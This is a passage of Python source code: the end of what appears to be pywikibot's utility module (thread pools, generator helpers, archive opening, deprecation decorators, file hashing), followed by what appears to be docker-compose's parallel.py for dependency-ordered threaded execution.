"islice_with_ellipsis() take only 'marker' as keyword arg, not %s"
% k)
except KeyError:
pass
_iterable = iter(iterable)
for el in itertools.islice(_iterable, *args):
yield el
if marker and s.stop is not None:
try:
next(_iterable)
except StopIteration:
pass
else:
yield marker
class ThreadList(list):
"""A simple threadpool class to limit the number of simultaneous threads.
Any threading.Thread object can be added to the pool using the append()
method. If the maximum number of simultaneous threads has not been reached,
the Thread object will be started immediately; if not, the append() call
will block until the thread is able to start.
>>> pool = ThreadList(limit=10)
>>> def work():
... time.sleep(1)
...
>>> for x in range(20):
... pool.append(threading.Thread(target=work))
...
"""
_logger = "threadlist"
def __init__(self, limit=128, *args):
"""Constructor."""
self.limit = limit
super(ThreadList, self).__init__(*args)
for item in self:
if not isinstance(threading.Thread, item):
raise TypeError("Cannot add '%s' to ThreadList" % type(item))
def active_count(self):
"""Return the number of alive threads, and delete all non-alive ones."""
cnt = 0
for item in self[:]:
if item.isAlive():
cnt += 1
else:
self.remove(item)
return cnt
def append(self, thd):
"""Add a thread to the pool and start it."""
if not isinstance(thd, threading.Thread):
raise TypeError("Cannot append '%s' to ThreadList" % type(thd))
while self.active_count() >= self.limit:
time.sleep(2)
super(ThreadList, self).append(thd)
thd.start()
debug("thread %d ('%s') started" % (len(self), type(thd)),
self._logger)
def stop_all(self):
"""Stop all threads the pool."""
if self:
debug(u'EARLY QUIT: Threads: %d' % len(self), self._logger)
for thd in self:
thd.stop()
debug(u'EARLY QUIT: Queue size left in %s: %s'
% (thd, thd.queue.qsize()), self._logger)
def intersect_generators(genlist):
"""
Intersect generators listed in genlist.
Yield items only if they are yielded by all generators in genlist.
Threads (via ThreadedGenerator) are used in order to run generators
in parallel, so that items can be yielded before generators are
exhausted.
Threads are stopped when they are either exhausted or Ctrl-C is pressed.
Quitting before all generators are finished is attempted if
there is no more chance of finding an item in all queues.
@param genlist: list of page generators
@type genlist: list
"""
# If any generator is empty, no pages are going to be returned
for source in genlist:
if not source:
debug('At least one generator ({0!r}) is empty and execution was '
'skipped immediately.'.format(source), 'intersect')
return
# Item is cached to check that it is found n_gen
# times before being yielded.
cache = collections.defaultdict(set)
n_gen = len(genlist)
# Class to keep track of alive threads.
# Start new threads and remove completed threads.
thrlist = ThreadList()
for source in genlist:
threaded_gen = ThreadedGenerator(name=repr(source), target=source)
threaded_gen.daemon = True
thrlist.append(threaded_gen)
while True:
# Get items from queues in a round-robin way.
for t in thrlist:
try:
# TODO: evaluate if True and timeout is necessary.
item = t.queue.get(True, 0.1)
# Cache entry is a set of thread.
# Duplicates from same thread are not counted twice.
cache[item].add(t)
if len(cache[item]) == n_gen:
yield item
# Remove item from cache.
# No chance of seeing it again (see later: early stop).
cache.pop(item)
active = thrlist.active_count()
max_cache = n_gen
if cache.values():
max_cache = max(len(v) for v in cache.values())
# No. of active threads is not enough to reach n_gen.
# We can quit even if some thread is still active.
# There could be an item in all generators which has not yet
# appeared from any generator. Only when we have lost one
# generator, then we can bail out early based on seen items.
if active < n_gen and n_gen - max_cache > active:
thrlist.stop_all()
return
except Queue.Empty:
pass
except KeyboardInterrupt:
thrlist.stop_all()
finally:
# All threads are done.
if thrlist.active_count() == 0:
return
def filter_unique(iterable, container=None, key=None, add=None):
"""
Yield unique items from an iterable, omitting duplicates.
By default, to provide uniqueness, it puts the generated items into
the keys of a dict created as a local variable, each with a value of True.
It only yields items which are not already present in the local dict.
For large collections, this is not memory efficient, as a strong reference
to every item is kept in a local dict which can not be cleared.
Also, the local dict cant be re-used when chaining unique operations on
multiple generators.
To avoid these issues, it is advisable for the caller to provide their own
container and set the key parameter to be the function L{hash}, or use a
L{weakref} as the key.
The container can be any object that supports __contains__.
If the container is a set or dict, the method add or __setitem__ will be
used automatically. Any other method may be provided explicitly using the
add parameter.
Beware that key=id is only useful for cases where id() is not unique.
Note: This is not thread safe.
@param iterable: the source iterable
@type iterable: collections.Iterable
@param container: storage of seen items
@type container: type
@param key: function to convert the item to a key
@type key: callable
@param add: function to add an item to the container
@type add: callable
"""
if container is None:
container = {}
if not add:
if hasattr(container, 'add'):
def container_add(x):
container.add(key(x) if key else x)
add = container_add
else:
def container_setitem(x):
container.__setitem__(key(x) if key else x,
True)
add = container_setitem
for item in iterable:
try:
if (key(item) if key else item) not in container:
add(item)
yield item
except StopIteration:
return
class CombinedError(KeyError, IndexError):
"""An error that gets caught by both KeyError and IndexError."""
class EmptyDefault(str, collections.Mapping):
"""
A default for a not existing siteinfo property.
It should be chosen if there is no better default known. It acts like an
empty collections, so it can be iterated through it savely if treated as a
list, tuple, set or dictionary. It is also basically an empty string.
Accessing a value via __getitem__ will result in an combined KeyError and
IndexError.
"""
def __init__(self):
"""Initialise the default as an empty string."""
str.__init__(self)
def _empty_iter(self):
"""An iterator which does nothing and drops the argument."""
return empty_iterator()
def __getitem__(self, key):
"""Raise always a L{CombinedError}."""
raise CombinedError(key)
iteritems = itervalues = iterkeys = __iter__ = _empty_iter
EMPTY_DEFAULT = EmptyDefault()
class SelfCallMixin(object):
"""
Return self when called.
When '_own_desc' is defined it'll also issue a deprecation warning using
issue_deprecation_warning('Calling ' + _own_desc, 'it directly').
"""
def __call__(self):
"""Do nothing and just return itself."""
if hasattr(self, '_own_desc'):
issue_deprecation_warning('Calling {0}'.format(self._own_desc),
'it directly', 2)
return self
class SelfCallDict(SelfCallMixin, dict):
"""Dict with SelfCallMixin."""
class SelfCallString(SelfCallMixin, str):
"""Unicode string with SelfCallMixin."""
class IteratorNextMixin(collections.Iterator):
"""Backwards compatibility for Iterators."""
if PY2:
def next(self):
"""Python 2 next."""
return self.__next__()
class DequeGenerator(IteratorNextMixin, collections.deque):
"""A generator that allows items to be added during generating."""
def __next__(self):
"""Python 3 iterator method."""
if len(self):
return self.popleft()
else:
raise StopIteration
class ContextManagerWrapper(object):
"""
Wraps an object in a context manager.
It is redirecting all access to the wrapped object and executes 'close' when
used as a context manager in with-statements. In such statements the value
set via 'as' is directly the wrapped object. For example:
>>> class Wrapper(object):
... def close(self): pass
>>> an_object = Wrapper()
>>> wrapped = ContextManagerWrapper(an_object)
>>> with wrapped as another_object:
... assert another_object is an_object
It does not subclass the object though, so isinstance checks will fail
outside a with-statement.
"""
def __init__(self, wrapped):
"""Create a new wrapper."""
super(ContextManagerWrapper, self).__init__()
super(ContextManagerWrapper, self).__setattr__('_wrapped', wrapped)
def __enter__(self):
"""Enter a context manager and use the wrapped object directly."""
return self._wrapped
def __exit__(self, exc_type, exc_value, traceback):
"""Call close on the wrapped object when exiting a context manager."""
self._wrapped.close()
def __getattr__(self, name):
"""Get the attribute from the wrapped object."""
return getattr(self._wrapped, name)
def __setattr__(self, name, value):
"""Set the attribute in the wrapped object."""
setattr(self._wrapped, name, value)
def open_archive(filename, mode='rb', use_extension=True):
"""
Open a file and uncompress it if needed.
This function supports bzip2, gzip and 7zip as compression containers. It
uses the packages available in the standard library for bzip2 and gzip so
they are always available. 7zip is only available when a 7za program is
available and only supports reading from it.
The compression is either selected via the magic number or file ending.
@param filename: The filename.
@type filename: str
@param use_extension: Use the file extension instead of the magic number
to determine the type of compression (default True). Must be True when
writing or appending.
@type use_extension: bool
@param mode: The mode in which the file should be opened. It may either be
'r', 'rb', 'a', 'ab', 'w' or 'wb'. All modes open the file in binary
mode. It defaults to 'rb'.
@type mode: string
@raises ValueError: When 7za is not available or the opening mode is unknown
or it tries to write a 7z archive.
@raises FileNotFoundError: When the filename doesn't exist and it tries
to read from it or it tries to determine the compression algorithm (or
IOError on Python 2).
@raises OSError: When it's not a 7z archive but the file extension is 7z.
It is also raised by bz2 when its content is invalid. gzip does not
immediately raise that error but only on reading it.
@return: A file-like object returning the uncompressed data in binary mode.
Before Python 2.7 the GzipFile object and before 2.7.1 the BZ2File are
wrapped in a ContextManagerWrapper with its advantages/disadvantages.
@rtype: file-like object
"""
def wrap(wrapped, sub_ver):
"""Wrap in a wrapper when this is below Python version 2.7."""
if PYTHON_VERSION < (2, 7, sub_ver):
return ContextManagerWrapper(wrapped)
else:
return wrapped
if mode in ('r', 'a', 'w'):
mode += 'b'
elif mode not in ('rb', 'ab', 'wb'):
raise ValueError('Invalid mode: "{0}"'.format(mode))
if use_extension:
# if '.' not in filename, it'll be 1 character long but otherwise
# contain the period
extension = filename[filename.rfind('.'):][1:]
else:
if mode != 'rb':
raise ValueError('Magic number detection only when reading')
with open(filename, 'rb') as f:
magic_number = f.read(8)
if magic_number.startswith(b'BZh'):
extension = 'bz2'
elif magic_number.startswith(b'\x1F\x8B\x08'):
extension = 'gz'
elif magic_number.startswith(b"7z\xBC\xAF'\x1C"):
extension = '7z'
else:
extension = ''
if extension == 'bz2':
if isinstance(bz2, ImportError):
raise bz2
return wrap(bz2.BZ2File(filename, mode), 1)
elif extension == 'gz':
return wrap(gzip.open(filename, mode), 0)
elif extension == '7z':
if mode != 'rb':
raise NotImplementedError('It is not possible to write a 7z file.')
try:
process = subprocess.Popen(['7za', 'e', '-bd', '-so', filename],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=65535)
except OSError:
raise ValueError('7za is not installed or cannot '
'uncompress "{0}"'.format(filename))
else:
stderr = process.stderr.read()
process.stderr.close()
if stderr != b'':
process.stdout.close()
raise OSError(
'Unexpected STDERR output from 7za {0}'.format(stderr))
else:
return process.stdout
else:
# assume it's an uncompressed file
return open(filename, 'rb')
def merge_unique_dicts(*args, **kwargs):
"""
Return a merged dict and making sure that the original dicts had unique keys.
The positional arguments are the dictionaries to be merged. It is also
possible to define an additional dict using the keyword arguments.
"""
args = list(args) + [dict(kwargs)]
conflicts = set()
result = {}
for arg in args:
conflicts |= set(arg.keys()) & set(result.keys())
result.update(arg)
if conflicts:
raise ValueError('Multiple dicts contain the same keys: '
'{0}'.format(', '.join(sorted(unicode(key) for key in conflicts))))
return result
# Decorators
#
# Decorator functions without parameters are _invoked_ differently from
# decorator functions with function syntax. For example, @deprecated causes
# a different invocation to @deprecated().
# The former is invoked with the decorated function as args[0].
# The latter is invoked with the decorator arguments as *args & **kwargs,
# and it must return a callable which will be invoked with the decorated
# function as args[0].
# The follow deprecators may support both syntax, e.g. @deprecated and
# @deprecated() both work. In order to achieve that, the code inspects
# args[0] to see if it callable. Therefore, a decorator must not accept
# only one arg, and that arg be a callable, as it will be detected as
# a deprecator without any arguments.
def signature(obj):
"""
Safely return function Signature object (PEP 362).
inspect.signature was introduced in 3.3, however backports are available.
In Python 3.3, it does not support all types of callables, and should
not be relied upon. Python 3.4 works correctly.
Any exception calling inspect.signature is ignored and None is returned.
@param obj: Function to inspect
@type obj: callable
@rtype: inpect.Signature or None
"""
try:
return inspect.signature(obj)
except (AttributeError, ValueError):
return None
def add_decorated_full_name(obj, stacklevel=1):
"""Extract full object name, including class, and store in __full_name__.
This must be done on all decorators that are chained together, otherwise
the second decorator will have the wrong full name.
@param obj: A object being decorated
@type obj: object
@param stacklevel: level to use
@type stacklevel: int
"""
if hasattr(obj, '__full_name__'):
return
# The current frame is add_decorated_full_name
# The next frame is the decorator
# The next frame is the object being decorated
frame = sys._getframe(stacklevel + 1)
class_name = frame.f_code.co_name
if class_name and class_name != '<module>':
obj.__full_name__ = (obj.__module__ + '.' +
class_name + '.' +
obj.__name__)
else:
obj.__full_name__ = (obj.__module__ + '.' +
obj.__name__)
def manage_wrapping(wrapper, obj):
"""Add attributes to wrapper and wrapped functions."""
wrapper.__doc__ = obj.__doc__
wrapper.__name__ = obj.__name__
wrapper.__module__ = obj.__module__
wrapper.__signature__ = signature(obj)
if not hasattr(obj, '__full_name__'):
add_decorated_full_name(obj, 2)
wrapper.__full_name__ = obj.__full_name__
# Use the previous wrappers depth, if it exists
wrapper.__depth__ = getattr(obj, '__depth__', 0) + 1
# Obtain the wrapped object from the previous wrapper
wrapped = getattr(obj, '__wrapped__', obj)
wrapper.__wrapped__ = wrapped
# Increment the number of wrappers
if hasattr(wrapped, '__wrappers__'):
wrapped.__wrappers__ += 1
else:
wrapped.__wrappers__ = 1
def get_wrapper_depth(wrapper):
"""Return depth of wrapper function."""
return wrapper.__wrapped__.__wrappers__ + (1 - wrapper.__depth__)
def add_full_name(obj):
"""
A decorator to add __full_name__ to the function being decorated.
This should be done for all decorators used in pywikibot, as any
decorator that does not add __full_name__ will prevent other
decorators in the same chain from being able to obtain it.
This can be used to monkey-patch decorators in other modules.
e.g.
<xyz>.foo = add_full_name(<xyz>.foo)
@param obj: The function to decorate
@type obj: callable
@return: decorating function
@rtype: function
"""
def outer_wrapper(*outer_args, **outer_kwargs):
"""Outer wrapper.
The outer wrapper may be the replacement function if the decorated
decorator was called without arguments, or the replacement decorator
if the decorated decorator was called without arguments.
@param outer_args: args
@type outer_args: list
@param outer_kwargs: kwargs
@type outer_kwargs: dict
"""
def inner_wrapper(*args, **kwargs):
"""Replacement function.
If the decorator supported arguments, they are in outer_args,
and this wrapper is used to process the args which belong to
the function that the decorated decorator was decorating.
@param args: args passed to the decorated function.
@param kwargs: kwargs passed to the decorated function.
"""
add_decorated_full_name(args[0])
return obj(*outer_args, **outer_kwargs)(*args, **kwargs)
inner_wrapper.__doc__ = obj.__doc__
inner_wrapper.__name__ = obj.__name__
inner_wrapper.__module__ = obj.__module__
inner_wrapper.__signature__ = signature(obj)
# The decorator being decorated may have args, so both
# syntax need to be supported.
if (len(outer_args) == 1 and len(outer_kwargs) == 0 and
callable(outer_args[0])):
add_decorated_full_name(outer_args[0])
return obj(outer_args[0])
else:
return inner_wrapper
if not __debug__:
return obj
return outer_wrapper
def issue_deprecation_warning(name, instead, depth, warning_class=None):
"""Issue a deprecation warning."""
if instead:
if warning_class is None:
warning_class = DeprecationWarning
warn(u'{0} is deprecated; use {1} instead.'.format(name, instead),
warning_class, depth + 1)
else:
if warning_class is None:
warning_class = _NotImplementedWarning
warn('{0} is deprecated.'.format(name), warning_class, depth + 1)
@add_full_name
def deprecated(*args, **kwargs):
"""Decorator to output a deprecation warning.
@kwarg instead: if provided, will be used to specify the replacement
@type instead: string
"""
def decorator(obj):
"""Outer wrapper.
The outer wrapper is used to create the decorating wrapper.
@param obj: function being wrapped
@type obj: object
"""
def wrapper(*args, **kwargs):
"""Replacement function.
@param args: args passed to the decorated function.
@type args: list
@param kwargs: kwargs passed to the decorated function.
@type kwargs: dict
@return: the value returned by the decorated function
@rtype: any
"""
name = obj.__full_name__
depth = get_wrapper_depth(wrapper) + 1
issue_deprecation_warning(name, instead, depth)
return obj(*args, **kwargs)
def add_docstring(wrapper):
"""Add a Deprecated notice to the docstring."""
deprecation_notice = 'Deprecated'
if instead:
deprecation_notice += '; use ' + instead + ' instead'
deprecation_notice += '.\n\n'
if wrapper.__doc__: # Append old docstring after the notice
wrapper.__doc__ = deprecation_notice + wrapper.__doc__
else:
wrapper.__doc__ = deprecation_notice
if not __debug__:
return obj
manage_wrapping(wrapper, obj)
# Regular expression to find existing deprecation notices
deprecated_notice = re.compile(r'(^|\s)DEPRECATED[.:;,]',
re.IGNORECASE)
# Add the deprecation notice to the docstring if not present
if not wrapper.__doc__:
add_docstring(wrapper)
else:
if not deprecated_notice.search(wrapper.__doc__):
add_docstring(wrapper)
else:
# Get docstring up to @params so deprecation notices for
# parameters don't disrupt it
trim_params = re.compile(r'^.*?((?=@param)|$)', re.DOTALL)
trimmed_doc = trim_params.match(wrapper.__doc__).group(0)
if not deprecated_notice.search(trimmed_doc): # No notice
add_docstring(wrapper)
return wrapper
without_parameters = len(args) == 1 and len(kwargs) == 0 and callable(args[0])
if 'instead' in kwargs:
instead = kwargs['instead']
elif not without_parameters and len(args) == 1:
instead = args[0]
else:
instead = False
# When called as @deprecated, return a replacement function
if without_parameters:
if not __debug__:
return args[0]
return decorator(args[0])
# Otherwise return a decorator, which returns a replacement function
else:
return decorator
def deprecate_arg(old_arg, new_arg):
"""Decorator to declare old_arg deprecated and replace it with new_arg."""
return deprecated_args(**{old_arg: new_arg})
def deprecated_args(**arg_pairs):
"""
Decorator to declare multiple args deprecated.
@param arg_pairs: Each entry points to the new argument name. With True or
None it drops the value and prints a warning. If False it just drops
the value.
"""
def decorator(obj):
"""Outer wrapper.
The outer wrapper is used to create the decorating wrapper.
@param obj: function being wrapped
@type obj: object
"""
def wrapper(*__args, **__kw):
"""Replacement function.
@param __args: args passed to the decorated function
@type __args: list
@param __kwargs: kwargs passed to the decorated function
@type __kwargs: dict
@return: the value returned by the decorated function
@rtype: any
"""
name = obj.__full_name__
depth = get_wrapper_depth(wrapper) + 1
for old_arg, new_arg in arg_pairs.items():
output_args = {
'name': name,
'old_arg': old_arg,
'new_arg': new_arg,
}
if old_arg in __kw:
if new_arg not in [True, False, None]:
if new_arg in __kw:
warn(u"%(new_arg)s argument of %(name)s "
u"replaces %(old_arg)s; cannot use both."
% output_args,
RuntimeWarning, depth)
else:
# If the value is positionally given this will
# cause a TypeError, which is intentional
warn(u"%(old_arg)s argument of %(name)s "
u"is deprecated; use %(new_arg)s instead."
% output_args,
DeprecationWarning, depth)
__kw[new_arg] = __kw[old_arg]
else:
if new_arg is False:
cls = PendingDeprecationWarning
else:
cls = DeprecationWarning
warn(u"%(old_arg)s argument of %(name)s is deprecated."
% output_args,
cls, depth)
del __kw[old_arg]
return obj(*__args, **__kw)
if not __debug__:
return obj
manage_wrapping(wrapper, obj)
if wrapper.__signature__:
# Build a new signature with deprecated args added.
# __signature__ is only available in Python 3 which has OrderedDict
params = OrderedDict()
for param in wrapper.__signature__.parameters.values():
params[param.name] = param.replace()
for old_arg, new_arg in arg_pairs.items():
params[old_arg] = inspect.Parameter(
old_arg, kind=inspect._POSITIONAL_OR_KEYWORD,
default='[deprecated name of ' + new_arg + ']'
if new_arg not in [True, False, None]
else NotImplemented)
wrapper.__signature__ = inspect.Signature()
wrapper.__signature__._parameters = params
return wrapper
return decorator
def remove_last_args(arg_names):
"""
Decorator to declare all args additionally provided deprecated.
All positional arguments appearing after the normal arguments are marked
deprecated. It marks also all keyword arguments present in arg_names as
deprecated. Any arguments (positional or keyword) which are not present in
arg_names are forwarded. For example a call with 3 parameters and the
original function requests one and arg_names contain one name will result
in an error, because the function got called with 2 parameters.
The decorated function may not use C{*args} or C{**kwargs}.
@param arg_names: The names of all arguments.
@type arg_names: iterable; for the most explanatory message it should
retain the given order (so not a set for example).
"""
def decorator(obj):
"""Outer wrapper.
The outer wrapper is used to create the decorating wrapper.
@param obj: function being wrapped
@type obj: object
"""
def wrapper(*__args, **__kw):
"""Replacement function.
@param __args: args passed to the decorated function
@type __args: list
@param __kwargs: kwargs passed to the decorated function
@type __kwargs: dict
@return: the value returned by the decorated function
@rtype: any
"""
name = obj.__full_name__
depth = get_wrapper_depth(wrapper) + 1
args, varargs, kwargs, _ = getargspec(wrapper.__wrapped__)
if varargs is not None and kwargs is not None:
raise ValueError('{0} may not have * or ** args.'.format(
name))
deprecated = set(__kw) & set(arg_names)
if len(__args) > len(args):
deprecated.update(arg_names[:len(__args) - len(args)])
# remove at most |arg_names| entries from the back
new_args = tuple(__args[:max(len(args), len(__args) - len(arg_names))])
new_kwargs = dict((arg, val) for arg, val in __kw.items()
if arg not in arg_names)
if deprecated:
# sort them according to arg_names
deprecated = [arg for arg in arg_names if arg in deprecated]
warn(u"The trailing arguments ('{0}') of {1} are deprecated. "
u"The value(s) provided for '{2}' have been dropped.".
format("', '".join(arg_names),
name,
"', '".join(deprecated)),
DeprecationWarning, depth)
return obj(*new_args, **new_kwargs)
manage_wrapping(wrapper, obj)
return wrapper
return decorator
def redirect_func(target, source_module=None, target_module=None,
old_name=None, class_name=None):
"""
Return a function which can be used to redirect to 'target'.
It also acts like marking that function deprecated and copies all
parameters.
@param target: The targeted function which is to be executed.
@type target: callable
@param source_module: The module of the old function. If '.' defaults
to target_module. If 'None' (default) it tries to guess it from the
executing function.
@type source_module: basestring
@param target_module: The module of the target function. If
'None' (default) it tries to get it from the target. Might not work
with nested classes.
@type target_module: basestring
@param old_name: The old function name. If None it uses the name of the
new function.
@type old_name: basestring
@param class_name: The name of the class. It's added to the target and
source module (separated by a '.').
@type class_name: basestring
@return: A new function which adds a warning prior to each execution.
@rtype: callable
"""
def call(*a, **kw):
issue_deprecation_warning(old_name, new_name, 2)
return target(*a, **kw)
if target_module is None:
target_module = target.__module__
if target_module and target_module[-1] != '.':
target_module += '.'
if source_module is '.':
source_module = target_module
elif source_module and source_module[-1] != '.':
source_module += '.'
else:
source_module = sys._getframe(1).f_globals['__name__'] + '.'
if class_name:
target_module += class_name + '.'
source_module += class_name + '.'
old_name = source_module + (old_name or target.__name__)
new_name = target_module + target.__name__
if not __debug__:
return target
return call
class ModuleDeprecationWrapper(types.ModuleType):
"""A wrapper for a module to deprecate classes or variables of it."""
def __init__(self, module):
"""
Initialise the wrapper.
It will automatically overwrite the module with this instance in
C{sys.modules}.
@param module: The module name or instance
@type module: str or module
"""
if isinstance(module, basestring):
module = sys.modules[module]
super(ModuleDeprecationWrapper, self).__setattr__('_deprecated', {})
super(ModuleDeprecationWrapper, self).__setattr__('_module', module)
self.__dict__.update(module.__dict__)
if __debug__:
sys.modules[module.__name__] = self
def _add_deprecated_attr(self, name, replacement=None,
replacement_name=None, warning_message=None):
"""
Add the name to the local deprecated names dict.
@param name: The name of the deprecated class or variable. It may not
be already deprecated.
@type name: str
@param replacement: The replacement value which should be returned
instead. If the name is already an attribute of that module this
must be None. If None it'll return the attribute of the module.
@type replacement: any
@param replacement_name: The name of the new replaced value. Required
if C{replacement} is not None and it has no __name__ attribute.
If it contains a '.', it will be interpreted as a Python dotted
object name, and evaluated when the deprecated object is needed.
@type replacement_name: str
@param warning_message: The warning to display, with positional
variables: {0} = module, {1} = attribute name, {2} = replacement.
@type warning_message: basestring
"""
if '.' in name:
raise ValueError('Deprecated name "{0}" may not contain '
'".".'.format(name))
if name in self._deprecated:
raise ValueError('Name "{0}" is already deprecated.'.format(name))
if replacement is not None and hasattr(self._module, name):
raise ValueError('Module has already an attribute named '
'"{0}".'.format(name))
if replacement_name is None:
if hasattr(replacement, '__name__'):
replacement_name = replacement.__module__
if hasattr(replacement, '__self__'):
replacement_name += '.'
replacement_name += replacement.__self__.__class__.__name__
replacement_name += '.' + replacement.__name__
else:
raise TypeError('Replacement must have a __name__ attribute '
'or a replacement name must be set '
'specifically.')
if not warning_message:
if replacement_name:
warning_message = '{0}.{1} is deprecated; use {2} instead.'
else:
warning_message = u"{0}.{1} is deprecated."
self._deprecated[name] = replacement_name, replacement, warning_message
def __setattr__(self, attr, value):
"""Set the value of the wrapped module."""
self.__dict__[attr] = value
setattr(self._module, attr, value)
def __getattr__(self, attr):
"""Return the attribute with a deprecation warning if required."""
if attr in self._deprecated:
warning_message = self._deprecated[attr][2]
warn(warning_message.format(self._module.__name__, attr,
self._deprecated[attr][0]),
DeprecationWarning, 2)
if self._deprecated[attr][1]:
return self._deprecated[attr][1]
elif '.' in self._deprecated[attr][0]:
try:
package_name = self._deprecated[attr][0].split('.', 1)[0]
module = __import__(package_name)
context = {package_name: module}
replacement = eval(self._deprecated[attr][0], context)
self._deprecated[attr] = (
self._deprecated[attr][0],
replacement,
self._deprecated[attr][2]
)
return replacement
except Exception:
pass
return getattr(self._module, attr)
@deprecated('open_archive()')
def open_compressed(filename, use_extension=False):
"""DEPRECATED: Open a file and uncompress it if needed."""
return open_archive(filename, use_extension=use_extension)
def file_mode_checker(filename, mode=0o600):
"""Check file mode and update it, if needed.
@param filename: filename path
@type filename: basestring
@param mode: requested file mode
@type mode: int
"""
warn_str = 'File {0} had {1:o} mode; converted to {2:o} mode.'
st_mode = os.stat(filename).st_mode
if stat.S_ISREG(st_mode) and (st_mode - stat.S_IFREG != mode):
os.chmod(filename, mode)
# re-read and check changes
if os.stat(filename).st_mode != st_mode:
warn(warn_str.format(filename, st_mode - stat.S_IFREG, mode))
def compute_file_hash(filename, sha='sha1', bytes_to_read=None):
"""Compute file hash.
Result is expressed as hexdigest().
@param filename: filename path
@type filename: basestring
@param func: hashing function among the following in hashlib:
md5(), sha1(), sha224(), sha256(), sha384(), and sha512()
function name shall be passed as string, e.g. 'sha1'.
@type filename: basestring
@param bytes_to_read: only the first bytes_to_read will be considered;
if file size is smaller, the whole file will be considered.
@type bytes_to_read: None or int
"""
size = os.path.getsize(filename)
if bytes_to_read is None:
bytes_to_read = size
else:
bytes_to_read = min(bytes_to_read, size)
step = 1 << 20
shas = ['md5', 'sha1', 'sha224', 'sha256', 'sha384', 'sha512']
assert sha in shas
sha = getattr(hashlib, sha)() # sha instance
with open(filename, 'rb') as f:
while bytes_to_read > 0:
read_bytes = f.read(min(bytes_to_read, step))
assert read_bytes # make sure we actually read bytes
bytes_to_read -= len(read_bytes)
sha.update(read_bytes)
return sha.hexdigest()
|
parallel.py
|
from __future__ import absolute_import
from __future__ import unicode_literals
import logging
import operator
import sys
from threading import Lock
from threading import Semaphore
from threading import Thread
from docker.errors import APIError
from docker.errors import ImageNotFound
from six.moves import _thread as thread
from six.moves.queue import Empty
from six.moves.queue import Queue
from compose.cli.colors import green
from compose.cli.colors import red
from compose.cli.signals import ShutdownException
from compose.const import PARALLEL_LIMIT
from compose.errors import HealthCheckFailed
from compose.errors import NoHealthCheckConfigured
from compose.errors import OperationFailedError
from compose.utils import get_output_stream
log = logging.getLogger(__name__)
STOP = object()
class GlobalLimit(object):
"""Simple class to hold a global semaphore limiter for a project. This class
should be treated as a singleton that is instantiated when the project is.
"""
global_limiter = Semaphore(PARALLEL_LIMIT)
@classmethod
def set_global_limit(cls, value):
if value is None:
value = PARALLEL_LIMIT
cls.global_limiter = Semaphore(value)
def parallel_execute_watch(events, writer, errors, results, msg, get_name):
""" Watch events from a parallel execution, update status and fill errors and results.
Returns exception to re-raise.
"""
error_to_reraise = None
for obj, result, exception in events:
if exception is None:
writer.write(msg, get_name(obj), 'done', green)
results.append(result)
elif isinstance(exception, ImageNotFound):
# This is to bubble up ImageNotFound exceptions to the client so we
# can prompt the user if they want to rebuild.
errors[get_name(obj)] = exception.explanation
writer.write(msg, get_name(obj), 'error', red)
error_to_reraise = exception
elif isinstance(exception, APIError):
errors[get_name(obj)] = exception.explanation
writer.write(msg, get_name(obj), 'error', red)
elif isinstance(exception, (OperationFailedError, HealthCheckFailed, NoHealthCheckConfigured)):
errors[get_name(obj)] = exception.msg
writer.write(msg, get_name(obj), 'error', red)
elif isinstance(exception, UpstreamError):
writer.write(msg, get_name(obj), 'error', red)
else:
errors[get_name(obj)] = exception
error_to_reraise = exception
return error_to_reraise
def parallel_execute(objects, func, get_name, msg, get_deps=None, limit=None):
"""Runs func on objects in parallel while ensuring that func is
ran on object only after it is ran on all its dependencies.
get_deps called on object must return a collection with its dependencies.
get_name called on object must return its name.
"""
objects = list(objects)
stream = get_output_stream(sys.stderr)
if ParallelStreamWriter.instance:
writer = ParallelStreamWriter.instance
else:
writer = ParallelStreamWriter(stream)
for obj in objects:
writer.add_object(msg, get_name(obj))
for obj in objects:
writer.write_initial(msg, get_name(obj))
events = parallel_execute_iter(objects, func, get_deps, limit)
errors = {}
results = []
error_to_reraise = parallel_execute_watch(events, writer, errors, results, msg, get_name)
for obj_name, error in errors.items():
stream.write("\nERROR: for {} {}\n".format(obj_name, error))
if error_to_reraise:
raise error_to_reraise
return results, errors
def _no_deps(x):
return []
class State(object):
"""
Holds the state of a partially-complete parallel operation.
state.started: objects being processed
state.finished: objects which have been processed
state.failed: objects which either failed or whose dependencies failed
"""
def __init__(self, objects):
self.objects = objects
self.started = set()
self.finished = set()
self.failed = set()
def is_done(self):
return len(self.finished) + len(self.failed) >= len(self.objects)
def pending(self):
return set(self.objects) - self.started - self.finished - self.failed
class NoLimit(object):
def __enter__(self):
pass
def __exit__(self, *ex):
pass
def parallel_execute_iter(objects, func, get_deps, limit):
"""
Runs func on objects in parallel while ensuring that func is
ran on object only after it is ran on all its dependencies.
Returns an iterator of tuples which look like:
# if func returned normally when run on object
(object, result, None)
# if func raised an exception when run on object
(object, None, exception)
# if func raised an exception when run on one of object's dependencies
(object, None, UpstreamError())
"""
if get_deps is None:
get_deps = _no_deps
if limit is None:
limiter = NoLimit()
else:
limiter = Semaphore(limit)
results = Queue()
state = State(objects)
while True:
feed_queue(objects, func, get_deps, results, state, limiter)
try:
event = results.get(timeout=0.1)
except Empty:
continue
# See https://github.com/docker/compose/issues/189
except thread.error:
raise ShutdownException()
if event is STOP:
break
obj, _, exception = event
if exception is None:
log.debug('Finished processing: {}'.format(obj))
state.finished.add(obj)
else:
log.debug('Failed: {}'.format(obj))
state.failed.add(obj)
yield event
def producer(obj, func, results, limiter):
"""
The entry point for a producer thread which runs func on a single object.
Places a tuple on the results queue once func has either returned or raised.
"""
with limiter, GlobalLimit.global_limiter:
try:
result = func(obj)
results.put((obj, result, None))
except Exception as e:
results.put((obj, None, e))
def feed_queue(objects, func, get_deps, results, state, limiter):
"""
Starts producer threads for any objects which are ready to be processed
(i.e. they have no dependencies which haven't been successfully processed).
Shortcuts any objects whose dependencies have failed and places an
(object, None, UpstreamError()) tuple on the results queue.
"""
pending = state.pending()
log.debug('Pending: {}'.format(pending))
for obj in pending:
deps = get_deps(obj)
try:
if any(dep[0] in state.failed for dep in deps):
log.debug('{} has upstream errors - not processing'.format(obj))
results.put((obj, None, UpstreamError()))
state.failed.add(obj)
elif all(
dep not in objects or (
dep in state.finished and (not ready_check or ready_check(dep))
) for dep, ready_check in deps
):
log.debug('Starting producer thread for {}'.format(obj))
t = Thread(target=producer, args=(obj, func, results, limiter))
t.daemon = True
t.start()
state.started.add(obj)
except (HealthCheckFailed, NoHealthCheckConfigured) as e:
log.debug(
'Healthcheck for service(s) upstream of {} failed - '
'not processing'.format(obj)
)
results.put((obj, None, e))
if state.is_done():
results.put(STOP)
class UpstreamError(Exception):
pass
